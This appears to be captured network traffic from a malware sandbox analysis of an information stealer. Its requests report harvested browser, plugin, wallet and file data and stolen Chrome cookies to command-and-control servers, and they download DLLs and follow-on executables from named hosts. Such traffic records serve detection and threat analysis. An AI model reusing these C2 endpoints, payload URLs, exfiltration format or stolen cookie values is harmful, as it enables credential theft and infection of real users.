Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGDHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 44 41 37 38 41 38 42 31 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"75DA78A8B1E73099305215------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"jony------IDAAKEHJDHJKEBFHJEGD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="message"browsers------GDHIDHIEGIIIECAKEBFB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJDHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"plugins------GIIIECBGDHJJKFIDAKJD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="message"fplugins------CGIEGHJEGHJKFIEBFHJK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHCHost: 85.28.47.4Content-Length: 7139Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCBHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 2d 2d 0d 0a Data Ascii: ------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="file"------KECBFBAEBKJJJJKFCGCB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGIHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 2d 2d 0d 0a Data Ascii: ------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HJKJEHJKJEBGHJJKEBGIContent-Disposition: form-data; name="file"------HJKJEHJKJEBGHJJKEBGI--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGIDHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 2d 2d 0d 0a Data Ascii: ------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="message"wallets------HJJEGIEHIJKKFIDHDGID--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="message"files------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file"------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIIDGCFHIEGDGCBFHDHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 42 46 48 44 2d 2d 0d 0a Data Ascii: ------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------JEHIIDGCFHIEGDGCBFHDContent-Disposition: form-data; name="message"jbdtaijovg------JEHIIDGCFHIEGDGCBFHD--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 44 41 37 38 41 38 42 31 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"75DA78A8B1E73099305215------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"jony------KJKJJEGIDBGIDGCBAFHC--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
